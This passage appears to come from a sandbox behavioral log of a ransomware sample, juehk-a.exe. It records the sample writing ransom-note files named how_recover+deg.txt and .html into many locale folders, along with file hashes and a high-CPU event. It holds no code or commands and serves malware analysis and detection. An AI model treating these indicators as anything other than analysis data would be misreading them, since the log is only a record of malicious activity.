15802.          value: C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\how_recover+deg.html
15803.          filesize: 9480
15804.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15805.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15806.          processinfo:
15807.            pid: 1648
15808.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15809.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15810.            ads:
15811.          fid (ads:): 1125899906942456
15812.          ntstatus: 0x0
15813.          CreateOptions: 0x0
15814.        file:
15815.          timestamp: 75494
15816.          mode: created
15817.          sequenceNumber: 1122
15818.          value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.txt
15819.          processinfo:
15820.            pid: 1648
15821.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15822.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15823.            ads:
15824.          fid (ads:): 562949953521145
15825.          ntstatus: 0x0
15826.          CreateOptions: 0x60
15827.        file:
15828.          timestamp: 75499
15829.          mode: close
15830.          sequenceNumber: 1123
15831.          value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.txt
15832.          filesize: 2673
15833.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15834.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15835.          processinfo:
15836.            pid: 1648
15837.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15838.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15839.            ads:
15840.          fid (ads:): 562949953521145
15841.          ntstatus: 0x0
15842.          CreateOptions: 0x0
15843.        file:
15844.          timestamp: 75504
15845.          mode: created
15846.          sequenceNumber: 1124
15847.          value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.html
15848.          processinfo:
15849.            pid: 1648
15850.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15851.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15852.            ads:
15853.          fid (ads:): 562949953521146
15854.          ntstatus: 0x0
15855.          CreateOptions: 0x60
15856.        file:
15857.          timestamp: 75508
15858.          mode: close
15859.          sequenceNumber: 1125
15860.          value: C:\Program Files\Common Files\Microsoft Shared\ink\he-IL\how_recover+deg.html
15861.          filesize: 9480
15862.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15863.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15864.          processinfo:
15865.            pid: 1648
15866.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15867.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15868.            ads:
15869.          fid (ads:): 562949953521146
15870.          ntstatus: 0x0
15871.          CreateOptions: 0x0
15872.        file:
15873.          timestamp: 75513
15874.          mode: created
15875.          sequenceNumber: 1126
15876.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.txt
15877.          processinfo:
15878.            pid: 1648
15879.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15880.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15881.            ads:
15882.          fid (ads:): 1125899906942459
15883.          ntstatus: 0x0
15884.          CreateOptions: 0x60
15885.        file:
15886.          timestamp: 75517
15887.          mode: close
15888.          sequenceNumber: 1127
15889.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.txt
15890.          filesize: 2673
15891.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15892.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15893.          processinfo:
15894.            pid: 1648
15895.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15896.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15897.            ads:
15898.          fid (ads:): 1125899906942459
15899.          ntstatus: 0x0
15900.          CreateOptions: 0x0
15901.        file:
15902.          timestamp: 75528
15903.          mode: created
15904.          sequenceNumber: 1128
15905.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.html
15906.          processinfo:
15907.            pid: 1648
15908.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15909.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15910.            ads:
15911.          fid (ads:): 562949953521148
15912.          ntstatus: 0x0
15913.          CreateOptions: 0x60
15914.        file:
15915.          timestamp: 75534
15916.          mode: close
15917.          sequenceNumber: 1129
15918.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\how_recover+deg.html
15919.          filesize: 9480
15920.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15921.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15922.          processinfo:
15923.            pid: 1648
15924.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15925.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15926.            ads:
15927.          fid (ads:): 562949953521148
15928.          ntstatus: 0x0
15929.          CreateOptions: 0x0
15930.        file:
15931.          timestamp: 75540
15932.          mode: created
15933.          sequenceNumber: 1130
15934.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.txt
15935.          processinfo:
15936.            pid: 1648
15937.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15938.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15939.            ads:
15940.          fid (ads:): 562949953521149
15941.          ntstatus: 0x0
15942.          CreateOptions: 0x60
15943.        file:
15944.          timestamp: 75552
15945.          mode: close
15946.          sequenceNumber: 1131
15947.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.txt
15948.          filesize: 2673
15949.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
15950.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
15951.          processinfo:
15952.            pid: 1648
15953.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15955.            ads:
15956.          fid (ads:): 562949953521149
15957.          ntstatus: 0x0
15958.          CreateOptions: 0x0
15959.        file:
15960.          timestamp: 75557
15961.          mode: created
15962.          sequenceNumber: 1132
15963.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.html
15964.          processinfo:
15965.            pid: 1648
15966.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15967.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15968.            ads:
15969.          fid (ads:): 562949953521150
15970.          ntstatus: 0x0
15971.          CreateOptions: 0x60
15972.        file:
15973.          timestamp: 75561
15974.          mode: close
15975.          sequenceNumber: 1133
15976.          value: C:\Program Files\Common Files\Microsoft Shared\ink\hu-HU\how_recover+deg.html
15977.          filesize: 9480
15978.          md5sum: a68c3caf0be8f1a393c697136926cfd4
15979.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
15980.          processinfo:
15981.            pid: 1648
15982.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15983.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15984.            ads:
15985.          fid (ads:): 562949953521150
15986.          ntstatus: 0x0
15987.          CreateOptions: 0x0
15988.        file:
15989.          timestamp: 75566
15990.          mode: created
15991.          sequenceNumber: 1134
15992.          value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.txt
15993.          processinfo:
15994.            pid: 1648
15995.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
15996.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
15997.            ads:
15998.          fid (ads:): 562949953521151
15999.          ntstatus: 0x0
16000.          CreateOptions: 0x60
16001.        file:
16002.          timestamp: 75571
16003.          mode: close
16004.          sequenceNumber: 1135
16005.          value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.txt
16006.          filesize: 2673
16007.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16008.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16009.          processinfo:
16010.            pid: 1648
16011.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16012.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16013.            ads:
16014.          fid (ads:): 562949953521151
16015.          ntstatus: 0x0
16016.          CreateOptions: 0x0
16017.        file:
16018.          timestamp: 75581
16019.          mode: created
16020.          sequenceNumber: 1136
16021.          value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.html
16022.          processinfo:
16023.            pid: 1648
16024.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16025.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16026.            ads:
16027.          fid (ads:): 562949953521152
16028.          ntstatus: 0x0
16029.          CreateOptions: 0x60
16030.        file:
16031.          timestamp: 75586
16032.          mode: close
16033.          sequenceNumber: 1137
16034.          value: C:\Program Files\Common Files\Microsoft Shared\ink\HWRCustomization\how_recover+deg.html
16035.          filesize: 9480
16036.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16037.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16038.          processinfo:
16039.            pid: 1648
16040.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16041.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16042.            ads:
16043.          fid (ads:): 562949953521152
16044.          ntstatus: 0x0
16045.          CreateOptions: 0x0
16046.        file:
16047.          timestamp: 75621
16048.          mode: created
16049.          sequenceNumber: 1138
16050.          value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.txt
16051.          processinfo:
16052.            pid: 1648
16053.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16054.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16055.            ads:
16056.          fid (ads:): 562949953521153
16057.          ntstatus: 0x0
16058.          CreateOptions: 0x60
16059.        file:
16060.          timestamp: 75635
16061.          mode: close
16062.          sequenceNumber: 1139
16063.          value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.txt
16064.          filesize: 2673
16065.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16066.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16067.          processinfo:
16068.            pid: 1648
16069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16071.            ads:
16072.          fid (ads:): 562949953521153
16073.          ntstatus: 0x0
16074.          CreateOptions: 0x0
16075.        file:
16076.          timestamp: 75640
16077.          mode: created
16078.          sequenceNumber: 1140
16079.          value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.html
16080.          processinfo:
16081.            pid: 1648
16082.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16083.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16084.            ads:
16085.          fid (ads:): 562949953521154
16086.          ntstatus: 0x0
16087.          CreateOptions: 0x60
16088.        file:
16089.          timestamp: 75645
16090.          mode: close
16091.          sequenceNumber: 1141
16092.          value: C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\how_recover+deg.html
16093.          filesize: 9480
16094.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16095.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16096.          processinfo:
16097.            pid: 1648
16098.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16099.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16100.            ads:
16101.          fid (ads:): 562949953521154
16102.          ntstatus: 0x0
16103.          CreateOptions: 0x0
16104.        file:
16105.          timestamp: 75654
16106.          mode: created
16107.          sequenceNumber: 1142
16108.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.txt
16109.          processinfo:
16110.            pid: 1648
16111.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16112.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16113.            ads:
16114.          fid (ads:): 562949953521155
16115.          ntstatus: 0x0
16116.          CreateOptions: 0x60
16117.        file:
16118.          timestamp: 75661
16119.          mode: close
16120.          sequenceNumber: 1143
16121.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.txt
16122.          filesize: 2673
16123.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16124.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16125.          processinfo:
16126.            pid: 1648
16127.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16128.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16129.            ads:
16130.          fid (ads:): 562949953521155
16131.          ntstatus: 0x0
16132.          CreateOptions: 0x0
16133.        apicall:
16134.          timestamp: 75633
16135.          repeat: 2000
16136.          sequenceNumber: 1144
16137.          processinfo:
16138.            pid: 1648
16139.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16140.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16141.          dllname: kernel32.dll
16142.          apiname: Sleep
16143.          address: 0x0041ed5b
16144.        file:
16145.          timestamp: 75676
16146.          mode: created
16147.          sequenceNumber: 1145
16148.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.html
16149.          processinfo:
16150.            pid: 1648
16151.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16152.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16153.            ads:
16154.          fid (ads:): 562949953521156
16155.          ntstatus: 0x0
16156.          CreateOptions: 0x60
16157.        file:
16158.          timestamp: 75680
16159.          mode: close
16160.          sequenceNumber: 1146
16161.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\how_recover+deg.html
16162.          filesize: 9480
16163.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16164.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16165.          processinfo:
16166.            pid: 1648
16167.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16168.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16169.            ads:
16170.          fid (ads:): 562949953521156
16171.          ntstatus: 0x0
16172.          CreateOptions: 0x0
16173.        file:
16174.          timestamp: 75685
16175.          mode: created
16176.          sequenceNumber: 1147
16177.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.txt
16178.          processinfo:
16179.            pid: 1648
16180.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16181.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16182.            ads:
16183.          fid (ads:): 562949953521157
16184.          ntstatus: 0x0
16185.          CreateOptions: 0x60
16186.        file:
16187.          timestamp: 75689
16188.          mode: close
16189.          sequenceNumber: 1148
16190.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.txt
16191.          filesize: 2673
16192.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16193.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16194.          processinfo:
16195.            pid: 1648
16196.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16197.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16198.            ads:
16199.          fid (ads:): 562949953521157
16200.          ntstatus: 0x0
16201.          CreateOptions: 0x0
16202.        file:
16203.          timestamp: 75694
16204.          mode: created
16205.          sequenceNumber: 1149
16206.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.html
16207.          processinfo:
16208.            pid: 1648
16209.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16210.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16211.            ads:
16212.          fid (ads:): 562949953521158
16213.          ntstatus: 0x0
16214.          CreateOptions: 0x60
16215.        file:
16216.          timestamp: 75698
16217.          mode: close
16218.          sequenceNumber: 1150
16219.          value: C:\Program Files\Common Files\Microsoft Shared\ink\ko-KR\how_recover+deg.html
16220.          filesize: 9480
16221.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16222.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16223.          processinfo:
16224.            pid: 1648
16225.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16226.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16227.            ads:
16228.          fid (ads:): 562949953521158
16229.          ntstatus: 0x0
16230.          CreateOptions: 0x0
16231.        file:
16232.          timestamp: 75737
16233.          mode: created
16234.          sequenceNumber: 1151
16235.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.txt
16236.          processinfo:
16237.            pid: 1648
16238.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16239.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16240.            ads:
16241.          fid (ads:): 562949953521159
16242.          ntstatus: 0x0
16243.          CreateOptions: 0x60
16244.        file:
16245.          timestamp: 75741
16246.          mode: close
16247.          sequenceNumber: 1152
16248.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.txt
16249.          filesize: 2673
16250.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16251.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16252.          processinfo:
16253.            pid: 1648
16254.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16255.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16256.            ads:
16257.          fid (ads:): 562949953521159
16258.          ntstatus: 0x0
16259.          CreateOptions: 0x0
16260.        file:
16261.          timestamp: 75747
16262.          mode: created
16263.          sequenceNumber: 1153
16264.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.html
16265.          processinfo:
16266.            pid: 1648
16267.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16268.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16269.            ads:
16270.          fid (ads:): 844424930231816
16271.          ntstatus: 0x0
16272.          CreateOptions: 0x60
16273.        file:
16274.          timestamp: 75752
16275.          mode: close
16276.          sequenceNumber: 1154
16277.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\how_recover+deg.html
16278.          filesize: 9480
16279.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16280.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16281.          processinfo:
16282.            pid: 1648
16283.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16284.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16285.            ads:
16286.          fid (ads:): 844424930231816
16287.          ntstatus: 0x0
16288.          CreateOptions: 0x0
16289.        file:
16290.          timestamp: 75758
16291.          mode: created
16292.          sequenceNumber: 1155
16293.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.txt
16294.          processinfo:
16295.            pid: 1648
16296.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16297.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16298.            ads:
16299.          fid (ads:): 844424930231817
16300.          ntstatus: 0x0
16301.          CreateOptions: 0x60
16302.        file:
16303.          timestamp: 75763
16304.          mode: close
16305.          sequenceNumber: 1156
16306.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.txt
16307.          filesize: 2673
16308.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16309.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16310.          processinfo:
16311.            pid: 1648
16312.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16313.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16314.            ads:
16315.          fid (ads:): 844424930231817
16316.          ntstatus: 0x0
16317.          CreateOptions: 0x0
16318.        file:
16319.          timestamp: 75774
16320.          mode: created
16321.          sequenceNumber: 1157
16322.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.html
16323.          processinfo:
16324.            pid: 1648
16325.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16326.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16327.            ads:
16328.          fid (ads:): 1125899906942474
16329.          ntstatus: 0x0
16330.          CreateOptions: 0x60
16331.        file:
16332.          timestamp: 75779
16333.          mode: close
16334.          sequenceNumber: 1158
16335.          value: C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\how_recover+deg.html
16336.          filesize: 9480
16337.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16338.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16339.          processinfo:
16340.            pid: 1648
16341.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16342.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16343.            ads:
16344.          fid (ads:): 1125899906942474
16345.          ntstatus: 0x0
16346.          CreateOptions: 0x0
16347.        file:
16348.          timestamp: 75784
16349.          mode: created
16350.          sequenceNumber: 1159
16351.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.txt
16352.          processinfo:
16353.            pid: 1648
16354.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16355.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16356.            ads:
16357.          fid (ads:): 844424930231819
16358.          ntstatus: 0x0
16359.          CreateOptions: 0x60
16360.        file:
16361.          timestamp: 75789
16362.          mode: close
16363.          sequenceNumber: 1160
16364.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.txt
16365.          filesize: 2673
16366.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16367.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16368.          processinfo:
16369.            pid: 1648
16370.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16371.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16372.            ads:
16373.          fid (ads:): 844424930231819
16374.          ntstatus: 0x0
16375.          CreateOptions: 0x0
16376.        high_cpu:
16377.          timestamp: 75893
16378.          sequenceNumber: 1161
16379.          total_cpu: 92.647011689291105
16380.          processinfo:
16381.            tainted: true
16382.            pid: 2312
16383.            process_cpu: 92.647011689291105
16384.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
16385.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16386.        file:
16387.          timestamp: 75972
16388.          mode: created
16389.          sequenceNumber: 1162
16390.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.html
16391.          processinfo:
16392.            pid: 1648
16393.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16394.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16395.            ads:
16396.          fid (ads:): 562949953521164
16397.          ntstatus: 0x0
16398.          CreateOptions: 0x60
16399.        file:
16400.          timestamp: 75978
16401.          mode: close
16402.          sequenceNumber: 1163
16403.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\how_recover+deg.html
16404.          filesize: 9480
16405.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16406.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16407.          processinfo:
16408.            pid: 1648
16409.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16410.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16411.            ads:
16412.          fid (ads:): 562949953521164
16413.          ntstatus: 0x0
16414.          CreateOptions: 0x0
16415.        file:
16416.          timestamp: 75984
16417.          mode: created
16418.          sequenceNumber: 1164
16419.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.txt
16420.          processinfo:
16421.            pid: 1648
16422.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16423.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16424.            ads:
16425.          fid (ads:): 844424930231821
16426.          ntstatus: 0x0
16427.          CreateOptions: 0x60
16428.        file:
16429.          timestamp: 75988
16430.          mode: close
16431.          sequenceNumber: 1165
16432.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.txt
16433.          filesize: 2673
16434.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16435.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16436.          processinfo:
16437.            pid: 1648
16438.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16439.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16440.            ads:
16441.          fid (ads:): 844424930231821
16442.          ntstatus: 0x0
16443.          CreateOptions: 0x0
16444.        file:
16445.          timestamp: 75994
16446.          mode: created
16447.          sequenceNumber: 1166
16448.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.html
16449.          processinfo:
16450.            pid: 1648
16451.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16452.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16453.            ads:
16454.          fid (ads:): 562949953521166
16455.          ntstatus: 0x0
16456.          CreateOptions: 0x60
16457.        file:
16458.          timestamp: 75998
16459.          mode: close
16460.          sequenceNumber: 1167
16461.          value: C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\how_recover+deg.html
16462.          filesize: 9480
16463.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16464.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16465.          processinfo:
16466.            pid: 1648
16467.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16468.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16469.            ads:
16470.          fid (ads:): 562949953521166
16471.          ntstatus: 0x0
16472.          CreateOptions: 0x0
16473.        file:
16474.          timestamp: 76034
16475.          mode: created
16476.          sequenceNumber: 1168
16477.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.txt
16478.          processinfo:
16479.            pid: 1648
16480.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16481.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16482.            ads:
16483.          fid (ads:): 844424930231823
16484.          ntstatus: 0x0
16485.          CreateOptions: 0x60
16486.        file:
16487.          timestamp: 76040
16488.          mode: close
16489.          sequenceNumber: 1169
16490.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.txt
16491.          filesize: 2673
16492.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16493.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16494.          processinfo:
16495.            pid: 1648
16496.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16497.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16498.            ads:
16499.          fid (ads:): 844424930231823
16500.          ntstatus: 0x0
16501.          CreateOptions: 0x0
16502.        file:
16503.          timestamp: 76055
16504.          mode: created
16505.          sequenceNumber: 1170
16506.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.html
16507.          processinfo:
16508.            pid: 1648
16509.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16510.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16511.            ads:
16512.          fid (ads:): 844424930231824
16513.          ntstatus: 0x0
16514.          CreateOptions: 0x60
16515.        file:
16516.          timestamp: 76062
16517.          mode: close
16518.          sequenceNumber: 1171
16519.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\how_recover+deg.html
16520.          filesize: 9480
16521.          md5sum: a68c3caf0be8f1a393c697136926cfd4
16522.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
16523.          processinfo:
16524.            pid: 1648
16525.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16526.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16527.            ads:
16528.          fid (ads:): 844424930231824
16529.          ntstatus: 0x0
16530.          CreateOptions: 0x0
16531.        file:
16532.          timestamp: 76071
16533.          mode: created
16534.          sequenceNumber: 1172
16535.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.txt
16536.          processinfo:
16537.            pid: 1648
16538.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16539.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16540.            ads:
16541.          fid (ads:): 844424930231825
16542.          ntstatus: 0x0
16543.          CreateOptions: 0x60
16544.        file:
16545.          timestamp: 76079
16546.          mode: close
16547.          sequenceNumber: 1173
16548.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.txt
16549.          filesize: 2673
16550.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
16551.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
16552.          processinfo:
16553.            pid: 1648
16554.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
16555.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
16556.            ads:
16557.          fid (ads:): 844424930231825
16558.          ntstatus: 0x0
16559.          CreateOptions: 0x0
16560.        file:
16561.          timestamp: 76087
16562.          mode: created
16563.          sequenceNumber: 1174
16564.          value: C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\how_recover+deg.html
16565.          processinfo:
16566.            pid: 1648
